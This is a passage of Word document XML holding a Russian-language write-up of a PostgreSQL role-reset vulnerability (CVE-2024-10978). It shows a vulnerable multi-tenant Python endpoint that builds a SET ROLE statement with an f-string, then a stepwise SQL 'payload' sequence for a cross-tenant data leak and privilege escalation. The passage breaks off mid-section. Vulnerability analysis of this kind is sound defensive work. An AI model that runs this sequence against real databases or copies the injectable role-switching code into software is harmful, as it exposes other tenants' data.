      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET SESSION AUTHORIZATION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имели ошибку в reset-логике: при определённых sequence событий (исключение внутри SECURITY DEFINER функции, повторный SET с RESET, нестандартное abort/rollback) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>current role не возвращалась к ожидаемому значению</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и следующий запрос в той же сессии исполнялся под предыдущей или неверной ролью. Для multi-tenant приложений, использующих </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per-request для разграничения tenant-ов, это означает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>утечку чужих данных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> между запросами разных tenant-ов, share-ящих одно соединение из pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2236AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0797FEB7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/accounts.py — типичный multi-tenant API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D13559F"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19C895DF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2A4F13"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528552E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from app.db.session import get_pooled_session  # connection pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758B848" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A24B37" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2C6B7F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1524E458" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/accounts")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4358CB87" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_accounts(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4084BF6D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id: str,  # из JWT-claim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB09A14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    session: AsyncSession = Depends(get_pooled_session),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7513D72A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153267A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # переключение в роль tenant_X для применения RLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BF8C8B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    await session.execute(text(f"SET ROLE tenant_{tenant_id}"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547F9BA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E82D90A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        rows = await session.execute(text("SELECT * FROM accounts"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCD3524" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [dict(r._mapping) for r in rows]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C7E1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    finally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFF2F25"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session.execute(text("RESET ROLE"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C08E02" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Login-роль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pool_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на все </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-роли; права на таблицу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> есть только у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_X</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ролей, с RLS-политикой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_id = current_setting('app.current_tenant')::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Соединение возвращается в pool после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RESET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Сценарий считается безопасным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> срабатывания CVE-2024-10978.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0314CE67" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload — cross-tenant leak через прерванный reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503EF9A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE-2024-10978 нельзя триггернуть одним SQL-вызовом: для него нужна </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>последовательность</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> событий, при которой reset-path не отрабатывает корректно. Минимальный сценарий с SECURITY DEFINER:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFBF993" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (от tenant_A через app):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA24395" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE tenant_A;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F079A66" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT app.do_audit_logged_action('user_x');  -- SECURITY DEFINER функция, внутри RAISE EXCEPTION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BB0AC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>do_audit_logged_action</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> происходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RAISE EXCEPTION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (например, проверка бизнес-правила). При выходе из функции с исключением reset current role работает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>некорректно</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> остаётся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_A</w:t>
      </w:r>
      <w:r>
        <w:t>, хотя session_user = pool_user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F995852" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (приложение перехватывает исключение, делает RESET ROLE, возвращает соединение в pool):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE2E70" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RESET ROLE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA857C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- pool возвращает соединение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3C4602" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reset на baseline </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pool_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> срабатывает, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plan-cache внутри session содержит выражение `current_role`</w:t>
      </w:r>
      <w:r>
        <w:t>, закэшированное под прерванной транзакцией. При следующем запросе план переиспользуется без re-evaluation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325696F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (соединение выдано tenant_B):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEA4C36" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE tenant_B;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7A7C39" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM accounts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFC70EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Из-за бага в reset-pipeline один из этапов проверки прав (RLS policy evaluation, либо ACL check) использует кэшированный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_role = tenant_A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вместо нового </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. RLS-политика </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_id = current_setting('app.current_tenant')::int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">фильтрует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>по неверному тенанту</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, возвращая строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> тенанта A приложению, обрабатывающему запрос от tenant_B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5584DBE2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер возвращает:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> чужого тенанта в HTTP-ответе. Application-код этого не замечает — нет ошибки, нет аномалии в логах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F4583F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> В multi-tenant приложении с pool-сессиями — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>тихая утечка чужих данных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> между запросами разных тенантов. Запросы выглядят нормально с точки зрения application logs (правильный JWT, правильный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET ROLE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, успешный response), но возвращаемые данные — от другого tenant-а. RLS не нарушается формально — выполняется политика, но с неверным значением </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_role</w:t>
      </w:r>
      <w:r>
        <w:t>. Эскалация — к чтению (и потенциально записи, если INSERT/UPDATE использует тот же кэшированный role) данных любого тенанта, кому принадлежит соединение в pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEA5F5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Дополнительный эффект: если у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> есть привилегии, которых нет у </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на admin-таблицы), то запрос от tenant_B получит доступ через права tenant_A. В цепочке это путь от обычного tenant-а к admin-tenant-у.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1658B9D8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
